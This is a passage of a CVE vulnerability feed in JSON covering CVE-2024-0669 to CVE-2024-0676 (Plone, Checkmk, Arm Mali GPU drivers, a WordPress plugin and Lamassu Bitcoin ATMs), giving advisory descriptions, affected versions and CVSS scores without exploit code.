"exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0669", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Cross-Frame Scripting vulnerability has been found on Plone CMS affecting verssion below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicios iframe element." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:plone:plone:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.0.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 3.7 } }, "publishedDate" : "2024-01-18T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0670", "ASSIGNER" : "security@checkmk.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-427" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://seclists.org/fulldisclosure/2024/Mar/29", "name" : "http://seclists.org/fulldisclosure/2024/Mar/29", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/29", "name" : "http://seclists.org/fulldisclosure/2024/Mar/29", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://checkmk.com/werk/16361", "name" : "https://checkmk.com/werk/16361", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://checkmk.com/werk/16361", "name" : "https://checkmk.com/werk/16361", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.0.0", "versionEndExcluding" : "2.1.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p17:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p18:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p19:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p20:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p21:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p22:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p23:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p24:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p25:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p26:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p16:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p15:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p14:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p13:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p12:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p11:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p10:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p27:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p28:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p29:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p30:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p31:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p32:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p33:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p34:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p35:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p36:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p37:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p38:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p39:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p15:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p20:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T15:15Z", "lastModifiedDate" : "2024-12-09T15:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0671", "ASSIGNER" : "arm-security@arm.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "name" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "name" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Midgard GPU Kernel Driver: from r19p0 through r32p0; Bifrost GPU Kernel Driver: from r7p0 through r48p0; Valhall GPU Kernel Driver: from r19p0 through r48p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r48p0.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:arm:5th_gen_gpu_architecture_kernel_driver:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r41p0", "versionEndExcluding" : "r49p0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:arm:bifrost_gpu_kernel_driver:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r7p0", "versionEndExcluding" : "r49p0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:arm:midgard_gpu_kernel_driver:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r19p0", "versionEndIncluding" : "r32p0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:arm:valhall_gpu_kernel_driver:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r19p0", "versionEndExcluding" : "r49p0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-19T09:15Z", "lastModifiedDate" : "2025-03-27T16:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0672", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/eceb6585-5969-4aa6-9908-b6bfb578190a/", "name" : "https://wpscan.com/vulnerability/eceb6585-5969-4aa6-9908-b6bfb578190a/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/eceb6585-5969-4aa6-9908-b6bfb578190a/", "name" : "https://wpscan.com/vulnerability/eceb6585-5969-4aa6-9908-b6bfb578190a/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Pz-LinkCard WordPress plugin through 2.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:popozure:pz-linkcard:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-28T05:15Z", "lastModifiedDate" : "2025-04-01T18:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0673", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/d80e725d-356a-4997-a352-33565e291fc8/", "name" : "https://wpscan.com/vulnerability/d80e725d-356a-4997-a352-33565e291fc8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/d80e725d-356a-4997-a352-33565e291fc8/", "name" : "https://wpscan.com/vulnerability/d80e725d-356a-4997-a352-33565e291fc8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Pz-LinkCard WordPress plugin through 2.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:popozure:pz-linkcard:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-28T05:15Z", "lastModifiedDate" : "2025-04-01T18:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0674", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-281" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:lamassu:douro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_ii_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:lamassu:douro_ii:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0675", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Vulnerability of improper checking for unusual or exceptional conditions\n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version,\n\n the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user.\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:lamassu:douro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_ii_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:lamassu:douro_ii:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "PHYSICAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0676", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Weak password requirement vulnerability \n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version\n\n, which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 